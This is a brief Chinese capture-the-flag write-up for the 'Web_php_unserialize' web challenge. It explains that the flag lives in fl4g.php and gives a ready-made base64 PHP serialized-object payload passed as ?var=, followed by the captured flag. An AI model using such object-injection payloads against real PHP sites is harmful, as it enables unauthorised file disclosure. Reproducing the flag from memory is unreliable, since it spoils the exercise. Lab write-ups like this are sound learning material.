攻防世界web进阶区之Web_php_unserialize

攻防世界web进阶区之Web_php_unserialize打开题目链接会得到一堆代码
攻防世界web进阶区之Web_php_unserialize通过 //the secret is in the fl4g.php 这句话我们可以看出来我们所需要的flag在fl4g.php中,我们需要通过反序列化才能得到fl4g.php里边的内容,借鉴下别人的代码通过在线运行工具我们就可以解出所需参数攻防世界web进阶区之Web_php_unserializeTzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
传参 ?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 即可得到flag
攻防世界web进阶区之Web_php_unserializectf{b17bd4c7-34c9-4526-8fa8-a0794a197013}